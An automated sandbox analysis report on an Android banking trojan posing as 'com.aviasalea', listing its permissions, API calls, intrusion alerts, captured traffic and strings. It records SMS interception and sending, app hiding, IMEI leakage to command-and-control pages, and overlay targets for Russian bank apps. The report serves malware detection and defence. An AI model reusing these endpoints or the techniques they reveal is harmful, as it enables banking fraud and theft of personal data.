Source: com.aviasalea.checkui.AdRequestDialog;->setAdmin:5 | API Call: android.app.admin.DevicePolicyManager.isAdminActive |
Source: com.aviasalea.srs.GPSrs;->hasAd:42 | API Call: android.app.admin.DevicePolicyManager.isAdminActive |
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39042 -> 185.212.128.192:80 |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39048 -> 185.212.128.192:80 |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39054 -> 185.212.128.192:80 |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39058 -> 185.212.128.192:80 |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39060 -> 185.212.128.192:80 |
Source: Traffic | Snort IDS: 2022986 ET TROJAN Likely Zbot Generic Request to gate.php Dotted-Quad 192.168.1.92:39062 -> 185.212.128.192:80 |
Source: HTTP Header | HTTP: All HTTP requests resultet into 404 Not Found |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ping -c 1 -w 1 172.217.16.174 |
Source: com.aviasalea.checktls.CmndTls;->isInternetConnected:150 | API Call: android.net.ConnectivityManager.getActiveNetworkInfo |
Source: com.aviasalea.checktls.CmndTls;->isInternetConnected:151 | API Call: android.net.NetworkInfo.isConnectedOrConnecting |
Source: com.aviasalea.checktls.WFTls;->onWifi:20 | API Call: android.net.wifi.WifiManager.isWifiEnabled |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 74.125.140.188 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.212.128.192 |
Source: com.aviasalea.checktls.WFTls;->onWifi:21 | API Call: android.net.wifi.WifiManager.setWifiEnabled |
Source: com.aviasalea.checktls.WFTls;->onWifi:25 | API Call: android.net.wifi.WifiManager.setWifiEnabled |
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection("http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on") |
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection("http://185.212.128.192/1324273/report.php") |
Source: com.aviasalea.ping.Ping;->onAddress:4 | API Call: java.net.InetAddress.getByName (URL: "google.com") |
Source: global traffic | HTTP traffic detected: GET /1324273/bee/avia/index1.php?ID=450785365059857103 HTTP/1.1Host: 185.212.128.192Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; VirtualBox Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-USX-Requested-With: com.aviasalea |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 185.212.128.192Connection: keep-aliveUser-Agent: Mozilla/5.0 (Linux; Android 7.1.2; VirtualBox Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36Accept: */*Referer: http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103Accept-Encoding: gzip, deflateAccept-Language: en-USX-Requested-With: com.aviasalea |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: global traffic | HTTP traffic detected: GET /1324273/gate.php?ID=450785365059857103&screen=on HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzip |
Source: unknown | HTTP traffic detected: POST /1324273/report.php HTTP/1.1Accept-Charset: UTF-8Content-Type: application/x-www-form-urlencodedContent-Length: 70User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H)Host: 185.212.128.192Connection: Keep-AliveAccept-Encoding: gzipData Raw: 31 3d 25 37 42 25 32 32 72 65 70 6f 72 74 25 32 32 25 33 41 25 32 32 73 6d 73 25 32 32 25 32 43 25 32 32 69 64 25 32 32 25 33 41 25 32 32 34 35 30 37 38 35 33 36 35 30 35 39 38 35 37 31 30 33 25 32 32 25 37 44 Data Ascii: 1=%7B%22report%22%3A%22sms%22%2C%22id%22%3A%22450785365059857103%22%7D |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Jun 2019 14:41:13 GMTServer: Apache/2.4.10 (Debian)Content-Length: 306Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 31 33 32 34 32 37 33 2f 62 65 65 2f 61 76 69 61 2f 69 6e 64 65 78 31 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 32 2e 31 32 |
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/ |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/alfa/index.php |
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.php?ID=450785365059857103 |
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/bee/avia/index1.phpru.berbankmobilecom.android.settings.DeviceAdminAd |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/homecredit/index.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/open/index.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/rus/index.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/tin/index.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/bee/vtb.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/gate.php |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on |
Source: librealtalk-jni.so | String found in binary or memory: http://185.212.128.192/1324273/http://le22999a.pw/1324273/start_accessdisable_sdef_sms_cl_packagepsu |
Source: android | String found in binary or memory: http://185.212.128.192/1324273/report.php |
Source: librealtalk-jni.so | String found in binary or memory: http://le22999a.pw/1324273/ |
Source: sber_login.xml | String found in binary or memory: http://schemas.android.com/apk/res-auto |
Source: notification_template_icon_group.xml, service_conf.xml, payment_ic_visa.xml, ntivu.xml, notification_media_action.xml, keyboard_view.xml, notification_template_part_time.xml, payment_ic_amex.xml, AndroidManifest.xml | String found in binary or memory: http://schemas.android.com/apk/res/android |
Source: Lcom/aviasalea/wb/WITools$Inj;->setApps(Lorg/json/JSONArray;)V | Method String: com.vtb.mobilebank, ru.alfabank.mobile.android, ru.alfabank.oavdo.amc, ru.m4bank.rsb.alipay, ru.m4bank.rsb, ru.simpls.brs2.mobbank, ru.vt24.mobilebanking.android |
Source: submitted apk | Request permission: android.permission.GET_TASKS |
Source: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop | getRunningTasks and getPackageName invocations in same method: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:9, com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:12 |
Source: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop | getRunningTasks and getPackageName invocations in same method: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:9, com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:12 |
Source: submitted apk | Request permission: android.permission.CALL_PHONE |
Source: submitted apk | Request permission: android.permission.SEND_SMS |
Source: com.aviasalea.checktls.CmndTls;->sendSMS:199 | API Call: android.telephony.SmsManager.sendTextMessage |
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:85 | API Call: android.telephony.SmsManager.sendTextMessage |
Source: com.aviasalea.checktls.MsTls;->sendFullSMS:99 | API Call: android.telephony.SmsManager.sendTextMessage |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.ping.PingNative;->ping:50 | API Call: java.lang.Runtime.exec ("ping -c 1 -w 1 172.217.16.174") |
Source: com.aviasalea.checktls.CmndTls;->canExecuteCommand:4 | API Call: java.lang.Runtime.exec |
Source: submitted apk | Request permission: android.permission.CALL_PHONE |
Source: submitted apk | Request permission: android.permission.CHANGE_NETWORK_STATE |
Source: submitted apk | Request permission: android.permission.CHANGE_WIFI_STATE |
Source: submitted apk | Request permission: android.permission.GET_TASKS |
Source: submitted apk | Request permission: android.permission.INTERNET |
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE |
Source: submitted apk | Request permission: android.permission.READ_SMS |
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS |
Source: submitted apk | Request permission: android.permission.SEND_SMS |
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW |
Source: submitted apk | Request permission: android.permission.WAKE_LOCK |
Source: submitted apk | Request permission: android.permission.WRITE_SETTINGS |
Source: classification engine | Classification label: mal88.troj.spyw.evad.and@0/251@0/0 |
Source: com.aviasalea.Realtalk;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("realtalk-jni") |
Source: com.aviasalea.checkui.ActOpenApp;->onCreate:13 | API Call: android.content.pm.PackageManager.getLaunchIntentForPackage |
Source: submitted apk | Request permission: android.permission.RECEIVE_BOOT_COMPLETED |
Source: com.aviasalea.MainActivity;->hideApp:11 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting |
Source: com.aviasalea.srs.CmndSrs;->hideApp:43 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting |
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW |
Source: submitted apk | Request permission: android.permission.GET_TASKS |
Source: com.aviasalea.checktls.CmndTls;->isInServiceProcess:135 | API Call: android.app.ActivityManager.getRunningAppProcesses |
Source: com.aviasalea.checktls.CmndTls;->isMyActivityRunning:155 | API Call: android.app.ActivityManager.getRunningAppProcesses |
Source: com.aviasalea.checktls.PkgTls;->getActivityAfterLolipop:6 | API Call: android.app.ActivityManager.getRunningAppProcesses |
Source: com.aviasalea.checktls.PkgTls;->getActivityBeforeLolipop:9 | API Call: android.app.ActivityManager.getRunningTasks |
Source: com.aviasalea.checktls.CmndTls;->getPhoneIMEINumber:51 | API Call: android.telephony.TelephonyManager.getDeviceId |
Source: com.aviasalea.checktls.CmndTls;->getPhoneNumber:59 | API Call: android.telephony.TelephonyManager.getLine1Number |
Source: com.aviasalea.checktls.CmndTls;->getPhoneNumber:60 | API Call: android.telephony.TelephonyManager.getLine1Number |
Source: com.aviasalea.api.request.HTTPConnection;-><init>:3 | API Call: java.net.URL.openConnection (URL: "http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on", POST data: "http://185.212.128.192/1324273/gate.php?ID=450785365059857103&screen=on", Leaked: "TelephonyManager.getDeviceId=450785365059857") |
Source: com.aviasalea.rcs.RestartService | Registered receiver: android.intent.action.NEW_OUTGOING_CALL |
Source: 192.168.1.92:39040 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39040 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39042 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39048 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39054 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39056 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39058 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39060 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39062 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: 192.168.1.92:39066 -> 185.212.128.192:80 | HTTP traffic detected: Header contains sensitive information: 450785365059857 (TelephonyManager.getDeviceId) |
Source: com.aviasalea.checktls.NdTls;->getClickableNode:33 | API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText |
Source: com.aviasalea.checktls.NdTls;->hasText:47 | API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText |
Source: submitted apk | Request permission: android.permission.READ_SMS |
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE |
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS |
Source: com.aviasalea.rcs.RestartService | Registered receiver: android.intent.action.PHONE_STATE |
Source: com.aviasalea.mess.service.receiver.SmsReceiver | Registered receiver: android.provider.Telephony.SMS_RECEIVED |
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:52 | Field access: android.provider.ContactsContract$CommonDataKinds$Email.CONTENT_URI |
Source: com.aviasalea.checktls.CmndTls$3;->run:19 | Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI |
Source: com.aviasalea.checktls.CntctsTls;->doInBackground:61 | Field access: android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.